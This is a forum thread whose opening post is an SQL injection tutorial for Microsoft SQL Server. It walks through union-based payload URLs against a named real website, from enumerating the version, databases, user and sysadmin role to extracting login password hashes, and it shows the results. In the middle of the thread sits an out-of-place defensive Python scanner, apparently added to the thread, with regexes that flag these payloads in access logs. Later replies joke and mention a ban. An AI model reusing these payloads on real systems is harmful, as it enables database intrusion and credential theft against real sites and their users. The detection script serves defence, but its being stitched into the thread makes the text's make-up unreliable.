Guest Praetorian Posted June 8, 2009 (edited)

----------------------------------[ MSSQL INJECTION ]----------------------------------
MSSQL is not as widely used as MySQL, which is why not many people know how to do MSSQL Injection.
While I was looking for a SQL [injection] on a gay site, I accidentally came across one vulnerable to MSSQL Inj, so I decided to write a tutorial, since it might come in handy for many!
You can read more about MSSQL here:
http://en.wikipedia.org/wiki/Microsoft_SQL_Server

----------------------------------[ Number of Columns ]----------------------------------
As with MySQL, we use order by *--
Number of columns = 26
Visible column = 9

----------------------------------[ Version ]----------------------------------
It is found the same way as in MySQL, with @@version, but not with version().
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
@@version = Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright © 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

----------------------------------[ The Database(s) ]----------------------------------
You can find the name of the main database with db_name().
If you want to see what other databases it has, use db_name(nr), where nr is the database number, e.g. nr=1,2,3 etc.
The main database is selft:
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,db_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
6 databases in total:
db_name(1) = master
db_name(2) = tempdb
db_name(3) = model
db_name(4) = msdb
db_name(5) = id3conf
db_name(6) = selft

----------------------------------[ Host Name ]----------------------------------
You can find the name with the help of host_name()
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,host_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

----------------------------------[ Main User ]----------------------------------
We can easily find it by replacing the visible column with user_name() or user.
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,user_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

----------------------------------[ How to check whether the admin has SA privileges ]----------------------------------
It is easy here too; all we have to do is put is_srvrolemember('sysadmin','sa')
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,is_srvrolemember('sysadmin','sa'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
If it returns 1, it means the admin has SA privileges [System Administrator]; otherwise it will return 0.
In case it does not work with is_srvrolemember('sysadmin','sa'), replace sysadmin with bulkadmin.
You can read more about SA here:
http://en.wikipedia.org/wiki/System_administrator

----------------------------------[ How to see the columns of a table ]----------------------------------
The syntax is www.site.com/...?id=-1+union+all+select+*,name,*+from+syscolumns--
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+syscolumns--
If you want to see the columns of a specific database, use the syntax:
www.site.com/...?id=-1+union+all+select+*,master..syscolumns.name,*+from+master..syscolumns--
Replace name with the name of the table whose columns you want to find.
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,master..syscolumns.xtype,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+master..syscolumns--

----------------------------------[ How to get the Admin's Hash ]----------------------------------
The syntax is simple:
www.site.com/...?id=-1 union all select *,password_hash,* from master.sys.sql_logins--
Hashes in MSSQL 2000/2005 are encrypted in SHA1, which have 40 characters.
http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,password_hash,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+master.sys.sql_logins--
As you can see, it does not show up, so we look in the page source.
And we see 1na1nb1ne1nf1ng1nh1va1vb1lalb1og1oh1cz1 [ which has 40 characters = SHA1 ]

----------------------------------[ Most common databases ]----------------------------------
These databases are the ones most often encountered:
northwind
model
msdb
pubs
tempdb

That's all for now, I'm too lazy to continue; maybe I'll add other things some other time.
Written by TinKode @ Insecurity.ro

Edited October 6, 2009 by Praetorian
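A defender-side counterpart to the enumeration steps in the post above, added here as an example and not part of the original thread or of any tool it mentions: a small Python scanner that URL-decodes the request path of each Common Log Format access-log line and flags the MSSQL-specific fingerprints the tutorial relies on (order-by column counting, @@version, db_name(), host_name(), user_name(), is_srvrolemember(), syscolumns, sys.sql_logins/password_hash). Run over a log, a probing sequence like the one described shows up as a chain of hits from one source IP, with the schema and login-table reads rated higher than the initial column probes. The log lines, IP addresses and host path are constructed placeholders, and the function and pattern names are my own.

```python
"""Detect union-based MSSQL enumeration attempts in web server access logs.

Added example (not part of the original post). It assumes NCSA/Apache
Common Log Format lines; the sample lines below are constructed, and the
IPs and path in them are placeholders.
"""
import re
from urllib.parse import unquote_plus

# Query-string fingerprints of the enumeration steps described in the post.
# Each maps a label to a regex applied to the URL-decoded request path.
MSSQL_ENUM_PATTERNS = {
    "union_select":    re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order_by_probe":  re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "version_probe":   re.compile(r"@@version", re.I),
    "db_enum":         re.compile(r"\bdb_name\s*\(", re.I),
    "host_enum":       re.compile(r"\bhost_name\s*\(", re.I),
    "user_enum":       re.compile(r"\buser_name\s*\(", re.I),
    "role_check":      re.compile(r"\bis_srvrolemember\s*\(", re.I),
    "schema_enum":     re.compile(r"\bsyscolumns\b", re.I),
    "login_hash_read": re.compile(r"\bsql_logins\b|\bpassword_hash\b", re.I),
}

# Labels showing the requester has moved past column counting into
# privilege checks, schema discovery or credential reads.
HIGH_SEVERITY = {"role_check", "login_hash_read", "schema_enum"}

# NCSA Common Log Format: ip ident user [ts] "METHOD path PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(path):
    """Return the sorted list of fingerprint labels found in a request path.

    The path is URL-decoded first so that '+' and %xx escapes cannot hide
    keywords from the patterns (the post's payloads use '+' for spaces).
    """
    decoded = unquote_plus(path)
    return sorted(label for label, rx in MSSQL_ENUM_PATTERNS.items()
                  if rx.search(decoded))


def scan_log(lines):
    """Parse CLF lines and return one finding per request that matches."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not CLF, or a truncated line: skip rather than guess
        labels = classify_request(m.group("path"))
        if not labels:
            continue
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "labels": labels,
            "severity": "high" if HIGH_SEVERITY & set(labels) else "medium",
        })
    return findings


def summarize_by_ip(findings):
    """Count matching requests per source IP. Repeated probes from one
    address are the real signal; a single hit may be a false positive."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample log lines (placeholder IPs and path).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jun/2009:10:15:01 +0000] "GET /deta.htm?idvideo=2077 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [08/Jun/2009:10:15:03 +0000] "GET /deta.htm?idvideo=2077+order+by+26-- HTTP/1.1" 200 5123',
    '203.0.113.7 - - [08/Jun/2009:10:15:09 +0000] "GET /deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,@@version,10 HTTP/1.1" 200 5401',
    '203.0.113.7 - - [08/Jun/2009:10:15:20 +0000] "GET /deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,is_srvrolemember(%27sysadmin%27,%27sa%27),10 HTTP/1.1" 200 5130',
    '203.0.113.7 - - [08/Jun/2009:10:16:02 +0000] "GET /deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,password_hash,10+from+master.sys.sql_logins-- HTTP/1.1" 200 5200',
    '198.51.100.4 - - [08/Jun/2009:10:16:40 +0000] "GET /search.htm?q=union+station HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["ts"], ",".join(f["labels"]))
    print(summarize_by_ip(scan_log(SAMPLE_LOG)))
```

Decoding before matching matters: the payloads in the post are written with `+` for spaces and would carry `%27` for the quotes once a browser encodes them, so a pattern applied to the raw line would miss `is_srvrolemember('sysadmin','sa')`. The word-boundary on `union ... select` keeps ordinary search terms such as "union station" out of the results; a HTTP 200 on a request that carries `@@version` or `sql_logins` still deserves a look at the application's own database logs, since the status code alone does not tell you whether the injected column was rendered.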
M4T3! Posted July 26, 2009
A question: how do I know that a site is vulnerable to MSSQL [injection]? Can I tell from the version, which is Microsoft SQL Server...?

Guest Praetorian Posted October 6, 2009
You can tell from the error.

ZeroCold Posted October 7, 2009
nice tutorial... "While I was looking for a SQL [injection] on a gay site...." Were you after a premium account :D:D ?

UnD3rGr0uNd Posted October 7, 2009
Decent tut :)... oh, and 1-0 for ZeroCold :))

dRuNNNk Posted October 11, 2009
"nice tutorial... Were you after a premium account :D:D ?" yeah, why, are you going to give us one? XD

bucifala Posted October 24, 2009
so what does this pest do in the end? :S

Nytro Posted October 24, 2009
"so what does this pest do in the end? :S" Permanent ban, spam. I think I had already banned him once or twice before...